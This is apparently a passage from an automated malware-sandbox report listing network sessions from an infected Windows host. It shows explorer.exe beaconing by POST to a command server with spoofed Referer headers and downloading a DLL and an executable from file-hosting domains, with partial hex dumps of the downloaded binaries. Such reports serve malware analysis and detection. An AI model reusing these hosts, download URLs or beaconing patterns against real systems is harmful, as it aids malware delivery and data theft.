                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                45192.168.2.34983395.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:05:00.805763006 CET11423OUTGET /sqlite3.dll HTTP/1.1
                                                                                                                                                                                Host: file-file-host4.com
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Cookie: PHPSESSID=sc69tg8a29f4pr0nv46ehfqbko
                                                                                                                                                                                Dec 1, 2021 10:05:00.890485048 CET11425INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.2
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:00 GMT
                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                Content-Length: 645592
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Last-Modified: Thu, 21 Oct 2021 11:48:30 GMT
                                                                                                                                                                                ETag: "9d9d8-5cedb79317f80"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 08 00 00 0e 00 00 00 38 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 37 37 00 00 00 00 00 94 0b 00 00 00 c0 08 00 00 0c 00 00 00 46 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 39 00 00 00 00 00 04 05 00 00 00 d0 08 00 00 06 00 00 00 52 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 31 30 32 00 00 00 00 0d 01 00 00 00 e0 08 00 00 02 00 00 00 58 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 31 31 33 00 00 00 00 db 19 00 00 00 f0 08 00 00 1a 00 00 00
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=Sv?!X` 8 L'p.text`0`.data@@.rdata$@@@.bss@.edata@0@.idataL@0.CRT@0.tls @0.reloc'(@0B/4`0@@B/19@@B/35MP@B/51`C`D@B/638@B/77F@B/89R@0B/102X@B/113


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                46192.168.2.34983495.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:05:01.203716993 CET11830OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://omcxl.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 293
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:05:01.307280064 CET12064INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:01 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                47192.168.2.34983595.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:05:01.447958946 CET12101OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://vhude.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 130
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:05:01.547652006 CET12102INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:01 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f7 e0 25 e5 39 1a 4b ef a8 8d 70 bc 57 da 4a d5 fe 24 85 21 ed c3 95 53 2f e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 46I:82OU&1UPJ%9KpWJ$!S/c0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                48192.168.2.34983695.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:05:01.644479036 CET12102OUTGET /files/5311_1638303032_7343.exe HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: host-file-host-3.com
                                                                                                                                                                                Dec 1, 2021 10:05:01.730918884 CET12104INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:01 GMT
                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                Content-Length: 1143000
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Last-Modified: Tue, 30 Nov 2021 20:10:32 GMT
                                                                                                                                                                                ETag: "1170d8-5d2072645dc9e"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 70 1c 69 a3 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 60 11 00 00 06 00 00 00 00 00 00 9e 7e 11 00 00 20 00 00 00 80 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 11 00 00 02 00 00 09 35 12 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 50 7e 11 00 4b 00 00 00 00 80 11 00 bc 02 00 00 00 00 00 00 00 00 00 00 00 68 11 00 d8 08 00 00 00 a0 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 5e 11 00 00 20 00 00 00 60 11 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 02 00 00 00 80 11 00 00 04 00 00 00 62 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 11 00 00 02 00 00 00 66 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 7e 11 00 00 00 00 00 48 00 00 00 02 00 05 00 00 18 02 00 dc 5f 05 00 03 00 00 00 da 07 00 06 dc 77 07 00 eb 89 06 00 c1 7d 11 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 12 00 00 17 2a 00 00 00 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 16 2a 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 12 00 00 17 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 0a 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 0d 00 04 00 00 00 00 00 00 00 00 00 14 2a 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 03 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 13 30 02 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 12 00 00 14 2a 00 00 00 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 13 30 05 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 05 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 05
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELpi0`~ @ 5@P~Kh H.text^ ` `.rsrcb@.relocf@B~H_w}B(~S(*0*B(~S(**B(~S(***0*0*0*B(~S(****0*B(~S(**0*0*0*0*B(~S(*0*0*B(~S(*0*0*0**B(~S(*0*0*0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                49192.168.2.34983795.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:05:06.595227957 CET14469OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://rxjdalrcm.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 230
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:05:06.695252895 CET14470INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:06 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                5192.168.2.34975395.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:27.436376095 CET1102OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://higvbe.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 283
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:27.537578106 CET1103INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:27 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                50192.168.2.34983895.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:05:06.794899940 CET14471OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://wxhnpjysno.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 113
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:05:06.893867970 CET14472INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:06 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                51192.168.2.34983995.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:05:07.005564928 CET14473OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://tiketfrip.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 130
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:05:07.107167006 CET14473INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:07 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                52192.168.2.34984095.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:05:07.208173037 CET14474OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://srvivkc.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 194
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:05:07.309169054 CET14475INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:05:07 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                53192.168.2.34984195.213.165.24980C:\Windows\explorer.exe
